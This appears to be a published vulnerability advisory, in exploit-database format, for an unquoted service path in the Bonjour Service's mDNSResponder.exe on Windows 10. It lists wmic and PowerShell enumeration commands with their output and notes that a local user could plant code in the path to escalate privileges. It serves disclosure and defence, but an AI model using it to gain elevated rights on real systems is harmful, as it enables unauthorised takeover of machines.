Bonjour service mdnsresponder.exe unquoted service path privilege escalation Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-07-16 | Type : local | Platform : windows


[+] Code ...

# Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service
Path
# Discovery by: bios
# Discovery Date: 2024-15-07
# Vendor Homepage: https://developer.apple.com/bonjour/
# Tested Version: 3,0,0,10
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Home

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
Bonjour Service
Bonjour Service
C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe
Auto

C:\>systeminfo

Host Name: DESKTOP-HFBJOBG
OS Name: Microsoft Windows 10 Home
OS Version: 10.0.19045 N/A Build 19045

PS C:\Program Files\Blizzard\Bonjour Service> powershell -command
"(Get-Command .\mDNSResponder.exe).FileVersionInfo.FileVersion"
>>
3,0,0,10

#Exploit:

There is an Unquoted Service Path in Bonjour Services (mDNSResponder.exe) .
This may allow an authorized local user to insert arbitrary code into the
unquoted service path and escalate privileges.